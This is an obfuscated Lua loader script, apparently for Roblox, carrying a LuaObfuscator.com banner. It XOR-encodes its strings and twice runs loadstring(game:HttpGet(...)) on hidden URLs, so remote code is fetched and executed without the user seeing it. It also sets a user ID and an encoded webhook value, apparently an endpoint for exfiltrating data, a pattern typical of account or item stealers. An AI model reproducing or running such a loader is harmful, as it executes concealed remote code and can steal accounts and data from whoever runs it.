--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v9,v10)local v11={};for v12=(1701 -1275) -(63 + 362), #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1)),v1(v2(v10,1 + 0 + ((v12-((1952 -(1596 + 355)) + 0))% #v10),1 + ((v12-(1 + 0))% #v10) + (1129 -(320 + (2138 -1330))))))%(807 -551)));end return v5(v11);end;loadstring(game:HttpGet(v8("\91\246\18\46\217\9\173\73\44\203\68\172\1\55\222\91\247\4\43\217\86\240\5\49\196\71\231\8\42\132\80\237\11\113\254\91\231\52\59\203\95\198\85\40\133\74\231\3\59\133\94\227\15\48\133\64\241\21","\51\130\102\94\170")))();wait(19 -14);_G.UserID=4172025368 -(96 + 17);_G.WebHook=v8("\214\6\69\201\229\73\145\93\85\208\229\16\209\0\85\151\245\28\211\93\80\201\255\92\201\23\83\209\249\28\213\1\30\136\166\69\138\68\5\137\166\68\136\75\8\139\164\65\135\70\0\143\185\59\147\16\9\253\244\16\203\37\127\203\238\65\251\49\84\252\239\1\237\7\116\234\197\27\221\63\118\246\166\69\200\75\105\213\195\3\212\30\85\221\221\10\237\59\103\238\255\74\207\74\3\214\193\21\237\61\93\237\229\34\217\20\88\212\219\20\234","\190\114\49\185\150\115");loadstring(game:HttpGet(v8("\209\144\88\109\100\74\50\25\203\133\91\51\112\25\105\94\204\134\89\110\114\2\126\89\215\144\73\115\99\94\126\89\212\203\127\116\123\21\115\85\220\183\79\111\126\0\105\69\150\180\95\101\68\19\111\95\201\144\95\51\91\5\124\25\212\133\69\115\56\32\110\78\248\145\88\114\113\17\111\91\151\144\94\104\114","\185\228\44\29\23\112\29\54")))();
